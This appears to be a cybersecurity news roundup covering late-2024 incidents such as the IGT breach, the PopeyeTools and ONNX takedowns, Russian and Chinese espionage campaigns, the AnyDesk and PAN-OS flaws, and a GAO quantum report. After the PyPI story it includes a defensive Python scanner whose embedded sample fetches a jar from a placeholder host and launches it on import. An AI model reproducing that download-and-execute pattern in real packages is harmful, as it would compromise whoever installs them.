Cyberattack Disrupts Systems of Gambling Giant IGT
International Game Technology (IGT), a global gambling and lottery giant, has confirmed a cyberattack that disrupted parts of its IT network. The breach, discovered on November 17, prompted the company to activate its incident response plan and engage external advisors for investigation and mitigation efforts.
“An unauthorized third party gained access to certain systems, resulting in disruptions to portions of internal IT systems and applications,” IGT disclosed in an SEC filing. Proactive measures, including taking certain systems offline, were implemented to safeguard operations.
IGT has yet to determine the material impact of the breach but assures stakeholders that business continuity plans are mitigating disruptions. While the nature of the attack is not specified, ransomware remains a likely culprit given the company’s response.
Headquartered in London, IGT employs over 11,000 individuals globally, specializing in slot machines, lottery technology, and gambling products. The company is coordinating with stakeholders and implementing interim measures to sustain services. Read the full SEC filing here.
US Takes Down Stolen Credit Card Marketplace PopeyeTools
The U.S. Department of Justice (DoJ) announced the takedown of PopeyeTools, a prominent marketplace for trading stolen credit card information, and unsealed charges against three individuals allegedly behind its operations.
PopeyeTools, operational since 2016, facilitated the sale of stolen financial data, including credit and debit card information, to enable fraud. The marketplace reportedly hosted thousands of users worldwide and generated over $1.7 million in revenue. Its offerings included stolen credentials, fraud-enabling tools, and services to verify the validity of illicit data. Authorities seized PopeyeTools’ domains (.com, .co.uk, .to) and $283,000 in cryptocurrency tied to the operation.
Three administrators—Abdul Ghaffar and Abdul Sami from Pakistan and Javed Mirza from Afghanistan—were charged with facilitating the illegal marketplace. This action underscores the ongoing U.S. efforts to dismantle platforms contributing to cybercrime.
For more details, read the DoJ’s official announcement.
Russian Cyberespionage Group Hits 60 Victims in Asia, Europe
A Russian cyberespionage group, TAG-110, linked to state-sponsored actor APT28 (Fancy Bear), has targeted over 60 victims across Asia and Europe, primarily in government, education, and human rights sectors, according to a Recorded Future report.
TAG-110’s malicious activities involve deploying custom malware such as HatVibe and CherrySpy to infiltrate systems and extract sensitive information. Victims span countries like Kazakhstan, India, Mongolia, and Ukraine, with notable targets including state-owned entities and human rights organizations.
The group uses phishing campaigns and exploits vulnerabilities in internet-facing systems to gain access. Recorded Future emphasizes that TAG-110’s activities align with Russia's geopolitical strategies, especially in Central Asia. This highlights the need for robust cybersecurity measures in vulnerable regions.
400,000 Systems Potentially Exposed to 2023’s Most Exploited Flaws
VulnCheck has reported that hundreds of thousands of internet-facing systems remain exposed to the most exploited vulnerabilities of 2023, posing significant risks to organizations worldwide.
The vulnerabilities, identified in widely used products from companies like Microsoft, Citrix, and Cisco, have been exploited by threat actors linked to countries such as China, Russia, and Iran. Many of these flaws were targeted as zero-days or exploited soon after public disclosure. Notably, the infamous Log4Shell vulnerability tops the list with over 100 public exploits.
Approximately 400,000 systems remain exposed, with Fortinet FortiOS appliances accounting for half of the vulnerable systems. VulnCheck emphasizes the need for robust patch management and reduced internet exposure to mitigate risks.
Read VulnCheck’s detailed analysis here.
Microsoft Disrupts ONNX Phishing Service, Names Operator
Microsoft has dismantled the ONNX phishing operation and publicly named its alleged operator, Abanoub Nady, an Egyptian developer who has been linked to several phishing-as-a-service offerings since 2017.
ONNX phishing kits, starting at $150 per month, were used to launch large-scale credential theft campaigns and adversary-in-the-middle (AitM) attacks to bypass multi-factor authentication. Microsoft, with support from the Linux Foundation, seized 240 domains tied to the operation, significantly hampering its activities.
While the disruption is a win, Microsoft warns that other cybercriminals are likely to fill the void. This action highlights the growing need for cross-industry collaboration to combat phishing and cybercrime.
Learn more about Microsoft’s legal action here.
Prompt Security Raises $18 Million for Gen-AI Security Platform
Generative AI security startup Prompt Security announced on Wednesday that it has raised $18 million in a Series A funding round, bringing its total funding to $23 million. The round was led by Jump Capital with participation from Hetz Ventures, Ridge Ventures, Okta, and F5.
Based in Tel Aviv, Israel, Prompt Security came out of stealth in January to address a growing concern: securing generative AI tools and preventing sensitive data exposure. The platform secures enterprise AI usage across browsers, copilots, coding assistants, and custom applications.
Prompt Security’s technology identifies and mitigates AI-specific threats, including jailbreaks, prompt injections, and shadow AI. According to the company, an average organization uses over 60 generative AI tools, with 39% of those being trained on internal enterprise data—potentially leading to significant compliance and security risks.
“Enterprises are accelerating their adoption of GenAI, but with it comes an explosion of risks,” said CEO Itamar Golan. “This funding supercharges our mission to secure GenAI deployments and enable safe AI innovation.”
Thai Court Dismisses Activist’s Pegasus Spyware Case Due to Lack of Evidence
A Thai court dismissed a lawsuit on Thursday filed by pro-democracy activist Jatupat Boonpattararaksa against NSO Group, the Israeli spyware producer known for its Pegasus software. Jatupat alleged his phone had been hacked using Pegasus during Thailand’s 2021 protests.
The court ruled the activist had insufficient evidence to prove his claims, despite investigations by watchdog groups like Citizen Lab confirming Pegasus attacks in Thailand. According to DigitalReach, over 35 activists were targeted between 2020 and 2021.
NSO Group stated it licenses Pegasus only to government agencies for lawful surveillance. However, activists argue the spyware is misused to suppress dissent. Amnesty International called the ruling "alarming" but reaffirmed its commitment to fighting unlawful spyware usage worldwide.
Read: Apple Suddenly Drops NSO Group Spyware Lawsuit
Russian Hackers Deploy HATVIBE and CHERRYSPY Malware Across Europe and Asia
Russian cyber espionage group TAG-110 has been linked to malware campaigns targeting government entities and research institutions in Central Asia, East Asia, and Europe, according to Recorded Future.
Using tools like HATVIBE and CHERRYSPY, the attackers exploit public-facing vulnerabilities and phishing schemes to exfiltrate data. First documented by CERT-UA in May 2023, these malware families have been used against 62 victims in countries such as Tajikistan, Kyrgyzstan, and Hungary.
TAG-110’s operations align with Russia’s broader geopolitical objectives, particularly following its invasion of Ukraine. Cybersecurity experts anticipate that Russia will escalate sabotage operations targeting NATO allies and critical infrastructure while adhering to hybrid warfare tactics outlined in the Gerasimov Doctrine.
APT-K-47 Uses Hajj-Themed Lures to Deploy Asyncshell Malware
Threat actor Mysterious Elephant, also referred to as APT-K-47, has been deploying a sophisticated version of Asyncshell malware using phishing lures themed around the Hajj, according to the Knownsec 404 Team.
The attack chain involves a CHM file disguised as an official Hajj policy document, tricking victims into executing malicious payloads. The malware uses evolving tactics, such as leveraging vulnerabilities like CVE-2023-38831 and switching to HTTPS for command-and-control communication.
APT-K-47 primarily targets Pakistani organizations and shares operational similarities with groups like SideWinder and Bitter. Researchers warn the group’s malware strategy highlights a persistent threat to South Asian nations’ cybersecurity.
China-Linked TAG-112 Targets Tibetan Media with Cobalt Strike Espionage Campaign
A China-linked nation-state group known as TAG-112 has been linked to a cyber espionage campaign targeting Tibetan media and university websites. The attack facilitated the delivery of the Cobalt Strike post-exploitation toolkit, often used by cybercriminals for data collection and further system breaches.
The attackers exploited vulnerabilities in Joomla-based content management systems, embedding malicious JavaScript to prompt users to download a disguised security certificate. This file, in reality, sideloaded a Cobalt Strike Beacon payload.
According to Recorded Future's Insikt Group, TAG-112 appears to be a subgroup of Evasive Panda (also known as Bronze Highland and StormBamboo). While TAG-112 uses simpler tactics, such as unencrypted JavaScript and off-the-shelf malware, both groups share a historical focus on targeting Tibetan organizations like Tibet Post and Gyudmed Tantric University.
The operation underscores China's continued focus on cyber espionage against Tibetan entities. Read more from Recorded Future.
Microsoft, Meta, and DOJ Disrupt Global Cybercrime and Fraudulent Networks
Microsoft, Meta Platforms, and the U.S. Department of Justice (DoJ) have launched independent actions to dismantle major cybercrime networks, targeting phishing operations and online fraud marketplaces.
Microsoft’s Digital Crimes Unit (DCU) seized 240 fraudulent websites linked to Egypt-based Abanoub Nady, operator of the phishing-as-a-service (PhaaS) platform ONNX. These phishing kits, sold for $150–$550, helped criminals bypass two-factor authentication (2FA) and gain access to sensitive accounts, including financial institutions. Read the full details from Microsoft.
Simultaneously, the DoJ shut down PopeyeTools, a marketplace for stolen credit card data, arresting three administrators linked to operations that reportedly earned $1.7 million since 2016. The marketplace advertised illegal tools and sensitive personal data, further exacerbating financial fraud globally. Details can be found at the DoJ website.
Meta also cracked down on pig butchering scams, dismantling accounts associated with organized crime syndicates in Southeast Asia. These scams use social media and dating apps to lure victims into fake investments. Meta continues to collaborate with partners like Coinbase and Ripple under the Tech Against Scams initiative. Learn more from Meta's newsroom.
PyPI Attack: ChatGPT, Claude Impersonators Deliver JarkaStealer via Python Libraries
Researchers have uncovered two malicious packages on the Python Package Index (PyPI) repository impersonating OpenAI’s ChatGPT and Anthropic’s Claude AI. The packages, gptplus and claudeai-eng, were designed to deliver JarkaStealer, an information-stealing malware.
Uploaded in late 2023, the libraries disguised malicious code within their __init__.py files, downloading a Java archive from GitHub and a Java Runtime Environment from Dropbox. Once executed, JarkaStealer harvested sensitive information, including browser data, screenshots, and session tokens from apps like Telegram and Discord.
The malware was marketed as malware-as-a-service (MaaS) on Telegram, available for $20–$50, although its source code was leaked on GitHub. Kaspersky researchers emphasize the importance of vigilance when using open-source software. Learn more from Kaspersky.
These incidents highlight the risks of supply chain attacks in software development, reinforcing the need for robust cybersecurity practices.
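The import-time download-and-execute pattern described above, turned into a defender-side check. This is an added example, not Kaspersky's code and not the malicious packages themselves: it parses a constructed sample __init__.py and flags network fetches and process launches that would run the moment the package is imported. The sample sources, placeholder URLs, and call-name lists are assumptions.

```python
import ast

# Constructed sample mimicking the reported import-time pattern (fetch a
# runtime and an archive, then launch it). It is only parsed, never run.
SAMPLE_INIT = '''import subprocess, urllib.request
def chat(prompt):
    return "placeholder"
urllib.request.urlretrieve("https://example.invalid/jre.zip", "/tmp/jre.zip")
urllib.request.urlretrieve("https://example.invalid/app.jar", "/tmp/app.jar")
subprocess.Popen(["/tmp/jre/bin/java", "-jar", "/tmp/app.jar"])
'''
# Constructed benign sample: the network call sits inside a function and
# therefore does not run when the package is imported.
BENIGN_INIT = "import requests\ndef fetch(url):\n    return requests.get(url, timeout=5)\n"

NETWORK_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen",
                 "urlretrieve", "urlopen", "requests.get", "requests.post"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "subprocess.check_output", "os.system", "os.popen",
              "os.startfile", "Popen", "exec", "eval"}

def _dotted_name(call):
    """Rebuild a call's dotted target, e.g. 'urllib.request.urlretrieve'."""
    parts, func = [], call.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))

def _import_time_nodes(node):
    """Yield nodes whose code runs on import; skip function and lambda bodies."""
    for child in ast.iter_child_nodes(node):
        if isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            continue
        yield child
        yield from _import_time_nodes(child)

def scan_init(source):
    """Return (lineno, kind, target) for each import-time network/exec call."""
    findings = []
    for node in _import_time_nodes(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node)
            if name in NETWORK_CALLS:
                findings.append((node.lineno, "network", name))
            elif name in EXEC_CALLS:
                findings.append((node.lineno, "exec", name))
    return findings

def is_suspicious(source):
    """The reported pattern: a download and an execution both at import time."""
    kinds = {kind for _, kind, _ in scan_init(source)}
    return {"network", "exec"} <= kinds

if __name__ == "__main__":
    for finding in scan_init(SAMPLE_INIT):
        print(finding)
```

The call lists are deliberately small; a real pre-install review would extend them and also look at setup.py, which runs at install time rather than import time.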
Chinese Hackers Preparing for Conflict, Says U.S. Cyber Official
Chinese hackers are embedding themselves in critical U.S. infrastructure networks to prepare for potential conflict with the United States, warned Morgan Adamski, executive director of U.S. Cyber Command, on Friday at the Cyberwarcon conference in Arlington, Virginia.
Adamski emphasized that Chinese cyber operations are strategically designed to give Beijing an upper hand in case of a military or political confrontation. Earlier this year, U.S. officials revealed evidence of Chinese-linked hackers compromising key IT networks, including systems crucial for energy and water infrastructure. This could allow for disruptive attacks such as manipulating HVAC systems in data centers or interrupting vital utility services.
One notable operation, dubbed “Salt Typhoon,” involved hackers targeting U.S. telecommunications firms, stealing sensitive data such as call records and communications of high-profile individuals, including campaign officials for the 2024 U.S. presidential elections. The FBI labeled it the worst telecom hack in U.S. history.
In response, the U.S. government has ramped up global defensive and offensive cybersecurity efforts, ranging from exposing Chinese operations to sanctions and cybersecurity advisories. Beijing, however, denies any involvement in cyber operations targeting the United States.
For more details, read the Reuters report.
Critical AnyDesk Vulnerability Exposes Users’ IP Addresses
A newly discovered critical vulnerability in AnyDesk, the popular remote desktop application, could expose users’ IP addresses, creating a significant privacy and security risk.
Identified as CVE-2024-52940, the flaw affects AnyDesk versions 8.1.0 and earlier on Windows systems. Discovered by security researcher Ebrahim Shafiei, the vulnerability stems from the “Allow Direct Connections” feature. Attackers can retrieve a user’s public IP address using only their AnyDesk ID, without any changes to the target system’s configuration.
The vulnerability also risks revealing private IP addresses on local networks, making it a serious concern for users. The National Institute of Standards and Technology (NIST) has assigned this flaw a CVSS base score of 7.5, indicating high severity.
What Users Can Do
While AnyDesk has yet to release a patch, users are urged to:
- Disable the “Allow Direct Connections” feature.
- Use VPN services to mask their IP addresses.
- Monitor for suspicious activity and keep AnyDesk updated.
This vulnerability serves as a wake-up call for developers and users alike to prioritize security in remote desktop applications. For a technical breakdown, visit Tenable’s CVE details.
EU Governments Push for Enhanced Resources for Cyber Agency ENISA
National governments are urging the European Commission to bolster the EU’s cybersecurity agency, ENISA, by increasing financial and human resources. This push comes ahead of the Cybersecurity Act review, which provides an opportunity to expand ENISA’s capabilities.
ENISA, headquartered in Athens, plays a critical role in implementing EU-wide cybersecurity regulations, including NIS 2, the Cyber Resilience Act, and the Cyber Solidarity Act. However, its responsibilities have outgrown its current resources. Governments are calling for a clearer and more focused mandate for ENISA to effectively support national governments and enhance the trustworthiness of ICT products through certification.
Key debates include the controversial EU Cloud Certification Scheme (EUCS), which remains unresolved. Incoming EU Tech Commissioner Henna Virkkunen is tasked with advancing cybersecurity adoption and certification processes.
Telecom ministers are expected to approve these recommendations in early December. For deeper insights, visit the full coverage on Euronews.
Palo Alto Networks Pushes Back as Shadowserver Spots 2K of Its Firewalls Exploited
A dispute has emerged between Shadowserver and Palo Alto Networks over the scale of compromised instances involving the PAN-OS operating system. Shadowserver’s scans identified approximately 2,000 firewalls compromised by a zero-day vulnerability. However, Palo Alto Networks countered these findings, stating the number of affected instances is significantly lower.
The Controversy
Shadowserver, a nonprofit focused on internet security monitoring, detected artifacts indicating compromise in around 2,000 instances. Palo Alto Networks’ Steven Thai, Senior Manager of Global Crisis Communications, dismissed these numbers, emphasizing that less than half a percent of their firewalls have an internet-exposed management interface.
The vulnerability in question, CVE-2024-0012, is an authentication bypass flaw patched earlier this week. Shadowserver CEO Piotr Kijewski reported that attackers have increasingly targeted this flaw alongside another critical PAN-OS vulnerability, CVE-2024-9474, as observed in scans starting Tuesday.
Palo Alto’s threat intelligence arm, Unit 42, has labeled this exploitation campaign as “Operation Lunar Peek” and is actively working to mitigate impacts. Despite Shadowserver’s findings, Palo Alto remains firm that its swift actions and advisories have minimized risks for its customers.
For more on this story, read the official advisory from Palo Alto Networks here and Shadowserver's ongoing research updates here.
GAO Warns of Quantum Threat to U.S. Cybersecurity Amid Leadership and Strategy Gaps
The Government Accountability Office (GAO) released a report highlighting the cybersecurity risks posed by quantum computing and the lack of a comprehensive U.S. strategy to address these threats. The report warns that leadership voids and insufficient funding could leave critical infrastructure sectors vulnerable as the nation transitions to post-quantum cryptography (PQC).
The Quantum Threat
Quantum computers, once powerful enough, could undermine current cryptographic defenses, potentially decrypting sensitive government and corporate data. The timeline for the emergence of a cryptographically relevant quantum computer (CRQC) is estimated at 10 to 20 years, but adversaries could already be storing encrypted data to exploit once these systems become viable—a strategy known as "harvest now, decrypt later."
The GAO report underscores the urgency of transitioning federal systems to quantum-safe methods, warning that a failure to act now could expose the U.S. to significant risks.
Current Strategy and Gaps
The U.S. has taken initial steps toward quantum readiness, including the National Institute of Standards and Technology (NIST) working on PQC standards and federal agencies planning migrations. However, critical infrastructure sectors, such as finance and energy, lack clear guidance and support for the transition. Moreover, the absence of measurable goals and milestones hampers progress.
The GAO identified the Office of the National Cyber Director (ONCD) as the best entity to lead the national strategy but noted that the office has yet to fully embrace this role. Without a central authority, efforts remain fragmented, increasing the risk of delays and vulnerabilities.
International and Industry Efforts
Globally, countries like those in the European Union and organizations such as NATO are advancing quantum-safe initiatives, often using hybrid cryptographic solutions to bridge the transition. Tech giants, including Google, Apple, and Amazon, have also begun integrating hybrid cryptography into their systems.
The GAO report criticized the U.S. strategy for not aligning with these international efforts, leaving gaps that adversaries could exploit.
Recommendations and Next Steps
The report calls for the ONCD to take charge by coordinating efforts across federal agencies, private sectors, and international partners. It also recommends more robust funding plans, better accountability frameworks, and incentives for private industries to offset the high costs of upgrading legacy systems.
Despite these challenges, the GAO remains optimistic that the 10- to 20-year timeline provides a window of opportunity for preparation—if decisive actions are taken immediately.
For more details, read the GAO’s full report on quantum cybersecurity here and explore NIST's PQC standards development updates here.